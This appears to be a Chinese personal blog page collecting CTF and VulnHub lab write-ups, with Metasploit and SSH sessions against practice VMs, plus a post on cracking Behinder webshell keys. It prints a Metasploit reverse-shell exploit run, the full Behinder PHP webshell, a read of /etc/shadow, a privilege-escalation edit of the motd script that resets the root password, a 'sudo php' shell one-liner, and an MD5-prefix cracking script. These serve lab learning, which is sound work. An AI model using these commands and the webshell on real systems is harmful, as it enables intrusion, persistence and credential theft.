jxswcy's blog

Hello CTF

DASCTF Sept X 浙江工业大学秋季挑战赛 writeup

发表于 2021-09-25 更新于 2021-10-31

本文字数： 610 阅读时长 ≈ 1 分钟

根据这篇文章的描述，对zip文件进行遍历

#!/usr/bin/env python3

import os

filePath = '/ttmp/zipBomb/'
#将文件夹下文件名生成list
filelist = os.listdir(filePath)

for i in range(len(filelist)):
  #查找FLAG文件
	os.system("unzip -l /ttmp/zipBomb/"+filelist[i]+" > ./tmp.txt")
	r = os.popen('cat tmp.txt')
	res = r.read()
	if "FLAG" in res:
		print("flag in " + filelist[i])

		#os.system("unzip -l /Users/chenyi/ttmp/zipBomb/"+filelist[i])
    #解压出FLAG并查看
		os.system("unzip /Users/chenyi/ttmp/zipBomb/"+filelist[i]+" 'FLAG'")
		os.system('head -c 100 FLAG')
		break

此处被调戏了

VulnHub Basic Pentesting: 2 writeup

发表于 2021-09-21 更新于 2021-10-05 分类于 VulnHub

本文字数： 58 阅读时长 ≈ 1 分钟

下载地址：https://www.vulnhub.com/entry/basic-pentesting-2,241/

VulnHub Basic Pentesting: 1 writeup

发表于 2021-09-21 更新于 2021-10-05 分类于 VulnHub

本文字数： 3.8k 阅读时长 ≈ 3 分钟

下载地址：https://www.vulnhub.com/entry/basic-pentesting-1,216/
扫描端口发现21端口服务为ProFTPD 1.3.3c

❯ nmap -A 192.168.231.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 12:53 CST
Nmap scan report for 192.168.231.24 (192.168.231.24)
Host is up (0.00054s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:F0:CB:0F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.231.24 (192.168.231.24)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds

proftpd_133c_backdoor漏洞

msf

❯ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.1.2-dev                           ]
+ -- --=[ 2159 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x

msf6 > search ProFTPD 1.3.3c

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/proftpd_133c_backdoor

msf6 > use 0
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.231.24
RHOSTS => 192.168.231.24
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.231.11
LHOST => 192.168.231.11
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.231.24   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.231.11   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run

[*] Started reverse TCP double handler on 192.168.231.11:4444
[*] 192.168.231.24:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Jhfs8hTmiycpfclp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.231.11:4444 -> 192.168.231.24:35220) at 2021-09-21 12:55:39 +0800

whoami
root
cat /etc/shadow | grep marlinspike
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::

❯ cat 24
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
❯ john 24 --show
marlinspike:marlinspike:17484:0:99999:7:::

1 password hash cracked, 0 left

VulnHub LAZYSYSADMIN: 1 writeup

发表于 2021-09-20 更新于 2021-10-05 分类于 VulnHub

本文字数： 7.2k 阅读时长 ≈ 7 分钟

下载地址：https://www.vulnhub.com/entry/lazysysadmin-1,205/
扫目录发现

❯ dirsearch -e * –timeout=2 -t 1 -x 400,403,404,500,503,429 -u http://192.168.231.23

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: 1.py | HTTP method: GET | Threads: 1 | Wordlist size: 8989

Target: http://192.168.231.23/

[21:24:08] Starting:
[21:24:13] 200 -  742B  - /apache/
[21:24:16] 200 -   35KB - /index.html
[21:24:16] 200 -   76KB - /info.php
[21:24:16] 301 -  320B  - /javascript  ->  http://192.168.231.23/javascript/
[21:24:17] 301 -  313B  - /old  ->  http://192.168.231.23/old/
[21:24:17] 200 -  736B  - /old/
[21:24:17] 301 -  320B  - /phpmyadmin  ->  http://192.168.231.23/phpmyadmin/
[21:24:18] 200 -    8KB - /phpmyadmin/
[21:24:18] 200 -    8KB - /phpmyadmin/index.php
[21:24:18] 200 -   92B  - /robots.txt
[21:24:19] 301 -  314B  - /test  ->  http://192.168.231.23/test/
[21:24:19] 200 -  738B  - /test/
[21:24:20] 200 -   12KB - /wordpress/
[21:24:20] 200 -    2KB - /wordpress/wp-login.php
[21:24:20] 301 -  312B  - /wp  ->  http://192.168.231.23/wp/
[21:24:21] 200 -  734B  - /wp/

Task Completed

robots.txt

User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

info.php可以看到phpinfo的信息
wordpress可以得到名字togie
namp扫一下端口

❯ nmap 192.168.231.23
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 21:23 CST
Nmap scan report for 192.168.231.23 (192.168.231.23)
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:62:2B:B9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

发现445端口，利用enum4linux扫共享目录
发现空账户登录

发现share$共享文件夹

访问服务器smb://192.168.231.23/share$从中发现deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

直接尝试登录

❯ sshpass -p 12345 ssh togie@192.168.231.23
Warning: Permanently added '192.168.231.23' (ECDSA) to the list of known hosts.
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #
##################################################################################################

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Sep 21 00:19:11 AEST 2021

  System load:  0.0               Processes:           175
  Usage of /:   46.1% of 2.89GB   Users logged in:     0
  Memory usage: 34%               IP address for eth0: 192.168.231.23
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# cd /root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

此外可以通过查看wordpress/wp-config.php

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT',       'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

访问wordpress/wp-login.php，利用Admin:TogieMYSQL12345^^登录，写马获得权限，目前复现失败。

VulnHub HA: NARAK writeup

发表于 2021-09-19 更新于 2021-09-20 分类于 VulnHub

本文字数： 6.3k 阅读时长 ≈ 6 分钟

下载地址：https://www.vulnhub.com/entry/ha-narak,569/

flag1

扫目录

❯ dirsearch -e * –timeout=2 -t 1 -x 400,403,404,500,503,429 -u http://192.168.231.22/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: 1.py | HTTP method: GET | Threads: 1 | Wordlist size: 8989

Output File: /usr/local/lib/python3.9/site-packages/dirsearch/reports/192.168.231.22/-_21-09-20_12-28-11.txt

Error Log: /usr/local/lib/python3.9/site-packages/dirsearch/logs/errors-21-09-20_12-28-11.log

Target: http://192.168.231.22/

[12:28:11] Starting:
[12:28:19] 301 -  317B  - /images  ->  http://192.168.231.22/images/
[12:28:19] 200 -    4KB - /images/
[12:28:19] 200 -    3KB - /index.html
[12:28:23] 401 -  461B  - /webdav/
[12:28:23] 401 -  461B  - /webdav/index.html
[12:28:23] 401 -  461B  - /webdav/servlet/webdav/

访问webdav得到登录界面，但是不知道密码
根据网上wp，扫出tips.txt，得到提示，还有一种就是通过cewl网站生成密码本爆破。

1	Hint to open the door of narak can be found in creds.txt.

扫UDP端口发现tftp服务，这个扫描比较慢

❯ nmap -sU 192.168.231.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 12:42 CST
Nmap scan report for 192.168.231.22 (192.168.231.22)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:02:7B:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1117.26 seconds

下载creds.txt得到账号密码

❯ tftp 192.168.231.22
tftp> get creds.txt
Received 22 bytes in 0.1 seconds
tftp> quit
❯ cat creds.txt
eWFtZG9vdDpTd2FyZw==
❯ echo "eWFtZG9vdDpTd2FyZw=="| base64 -D
yamdoot:Swarg%

利用cadaver上传shell

❯ cadaver http://192.168.231.22/webdav/
Authentication required for webdav on server `192.168.231.22':
Username: yamdoot
Password:
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 35 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.231.22' closed.

注意，这里用不了菜刀、蚁剑等工具上马，只能在网页命令执行，因为除了要验证登录，每次命令执行报头的信息也跟着变化，具体可以抓包看看。
利用马查看信息，发现/mnt/hell.sh

1	#!/bin/bash echo"Highway to Hell"; --[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

brainfuck解码得chitragupt
通过ls /home得到用户名inferno narak yamdoot
尝试登录

❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:00 2021 from 192.168.231.1
inferno@ubuntu:~$ ls
user.txt
inferno@ubuntu:~$ cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}

flag2

发现motd有读写权限，motd提权

inferno@ubuntu:~$ ls -la /etc/update-motd.d/00-header
-rwxrwxrwx 1 root root 1254 Sep 19 22:50 /etc/update-motd.d/00-header
inferno@ubuntu:~$ echo "echo 'root:admin' | sudo chpasswd" >> /etc/update-motd.d/00-header
inferno@ubuntu:~$ cat /etc/update-motd.d/00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
	# Fall back to using the very slow lsb_release utility
	DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
echo 'root:admin' | sudo chpasswd

退出后重新登录，利用新密码获得root权限

inferno@ubuntu:~$ exit
logout
Connection to 192.168.231.22 closed.
❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:21 2021 from 192.168.231.1
inferno@ubuntu:~$ sudo su
[sudo] password for inferno:
Sorry, try again.
[sudo] password for inferno:
sudo: 1 incorrect password attempt
inferno@ubuntu:~$ su root
Password:
root@ubuntu:/home/inferno# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████


Root Flag: {9440aee508b6215995219c58c8ba4b45}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari  : https://www.linkedin.com/in/jeenali-kothari/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________

VulnHub ME AND MY GIRLFRIEND: 1 writeup

发表于 2021-09-18 更新于 2021-09-20 分类于 VulnHub

本文字数： 2.7k 阅读时长 ≈ 2 分钟

下载地址：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

flag1

xff绕过

1	x-forwarded-for:127.0.0.1

注册admin成功，点击Profile发现id参数，访问index.php?page=profile&user_id=5可以看到alice密码4lic3
ssh登录找到flag1

❯ ssh alice@192.168.231.21
The authenticity of host '192.168.231.21 (192.168.231.21)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.231.21' (ECDSA) to the list of known hosts.
alice@192.168.231.21's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ ls -la
total 32
drwxr-xr-x 4 alice alice 4096 Dec 13  2019 .
drwxr-xr-x 6 root  root  4096 Dec 13  2019 ..
-rw------- 1 alice alice   10 Dec 13  2019 .bash_history
-rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
-rw-r--r-- 1 alice alice 3637 Dec 13  2019 .bashrc
drwx------ 2 alice alice 4096 Dec 13  2019 .cache
drwxrwxr-x 2 alice alice 4096 Dec 13  2019 .my_secret
-rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13  2019 .
drwxr-xr-x 4 alice alice 4096 Dec 13  2019 ..
-rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

flag2

查看alice权限，发现能sudo php，可以php注入

alice@gfriEND:~/.my_secret$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
alice@gfriEND:~/.my_secret$ sudo php -r 'system("/bin/bash");'
root@gfriEND:~/.my_secret# cd /
root@gfriEND:/# find / -name flag2.txt
/root/flag2.txt
root@gfriEND:/# cat /root/flag2.txt

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

爆破那些事

发表于 2021-09-18 更新于 2021-09-20

本文字数： 6k 阅读时长 ≈ 5 分钟

从冰蝎的爆破说起，下面是冰蝎提供的马

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");

		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15];
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

其密钥为密码的32位md5值的前16位，默认连接密码rebeyond，密钥我们可以更换，但是在知道密钥的情况下，我们依然可以有机会获得权限，一是许多人认为有一层md5加密，密码不会很复杂；二是密钥为密码md5的前16位，有可能产生碰撞。于是乎找了网上的一个脚本，改了一改，对md5前n位进行比对


"""
    简易MD5破解工具
    https://www.perfcode.com/p/python-crack-md5-hash.html
"""

import threading
from hashlib import md5 as _md5

def MD5(bytes):
    m=_md5()
    m.update(bytes)
    return m.hexdigest()

class _PWDict:
    def __init__(self,filename):
        self.mutex = threading.Lock()
        self.fp = open(filename,'rb')

    def get(self):
        with self.mutex:
            bytes = self.fp.readline()
        return bytes.strip()

class _crackMD5:
    def __init__(self,md5,PWDict,func=None,threadQuantity=5):
        self.md5 = md5.lower()
        self.D = PWDict
        if func:
            self.func = func
        else:
            self.func = print

        self.threadQuantity = threadQuantity

        self.status = False
        self.T = []

    def _run(self):
        while self.status:
            bytes = self.D.get()
#            if self.md5[0:16] == MD5(bytes)[0:16]:
            if self.md5[0:len(self.md5)] == MD5(bytes)[0:len(self.md5)]:

                self.status = False
                self.func(bytes)

    def start(self):
        self.status = True
        for i in range(self.threadQuantity):
            thread = threading.Thread(target=self._run)
            thread.start()
            self.T.append(thread)

def main():
    import sys
    if len(sys.argv) < 3:
        print("usage:  crackmd5.py md5-hash dictionary_file [thread_quantity]")
        return

    md5 = sys.argv[1]


    dict_file = sys.argv[2]

    try:
        D = _PWDict(dict_file)
    except Exception as e:
        print(e)
        return

    if len(sys.argv) >3:
        tc=int(sys.argv[3])
        if tc <1:
            print("错误的线程数.")
            return
    else:
        tc = 5

    def myPrint(v):
        print("破解成功：",v)

    crackMD5 = _crackMD5(md5,D,myPrint,tc)
    print('cracking ...')
    crackMD5.start()

if __name__ == '__main__':
    main()

密码本选择weakpass_3p，虽然它上面还有一个weakpass_3甚至
weakpass_3a，但看说明，密码相比前两个密码包仅包含可打印字符集，包含1454086314个密码，md5解密遍历完大约一个小时，对我们来说正好够用。
Let’s crack!!!

1	python3 md5.py e10adc3949ba59ab weakpass_3p

识别hash类型

如果拿到一串密文，如何确定是什么加密方式呢？
Hash-Algorithm-Identifier

1
2
3

git clone https://github.com/AnimeshShaw/Hash-Algorithm-Identifier
cd Hash-Algorithm-Identifier
./start.sh


  _    _           _       _____    _            _   _  __ _
 | |  | |         | |     |_   _|  | |          | | (_)/ _(_)
 | |__| | __ _ ___| |__     | |  __| | ___ _ __ | |_ _| |_ _  ___ _ __
 |  __  |/ _` / __| '_ \    | | / _` |/ _ \ '_ \| __| |  _| |/ _ \ '__|
 | |  | | (_| \__ \ | | |  _| || (_| |  __/ | | | |_| | | | |  __/ |
 |_|  |_|\__,_|___/_| |_| |_____\__,_|\___|_| |_|\__|_|_| |_|\___|_|
 ----------------------------------------------------------------------
                                            Version: 3.4
                                            Coded By: Psycho_Coder
 ----------------------------------------------------------------------


Move to the folder (hashidentifier) containing the file HashIdentifier.py and then
run in terminal

    python HashIdentifier.py <Your hash>

    or

    python HashIdentifier.py

The above opens the interactive mode where you can repeatedly give hashes. To exit
from the interactive mode simple write any one of the following commands :-
                        "quit, or q, or exit, or end"

For more details please refer to the README

                2.7.x <= Python Compatibility <= 3.x.x

________________________________________________________________________________


Enter the Hash : 89327779fb6af51e03f6f9a27e90e883

Most Probable Hash Algorithms found:

[+] MD5(ZipMonster)
[+] SSHA-1

Other Possible Hash Algorithms found:

[+] MD5(HMAC(Wordpress))
[+] MD5(HMAC)
[+] MD5
[+] RIPEMD-128
